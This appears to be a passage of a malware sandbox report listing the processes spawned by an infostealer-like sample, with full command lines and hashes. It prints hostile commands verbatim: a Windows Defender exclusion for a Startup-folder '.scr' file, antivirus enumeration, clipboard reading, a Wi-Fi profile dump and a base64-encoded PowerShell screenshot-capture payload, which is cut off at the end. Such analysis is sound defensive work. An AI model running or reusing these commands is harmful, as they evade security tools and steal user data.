                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff6bfe40000
                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                    Imagebase:0x7ff74dbf0000
                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:09:24:07
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:09:24:07
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                    Imagebase:0x7ff74dbf0000
                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:09:24:07
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:09:24:07
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:09:24:07
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:09:24:08
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:09:24:08
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:09:24:09
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:34
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:36
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:37
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:39
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff6bfe40000
                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:43
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff6bfe40000
                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:44
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:45
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAu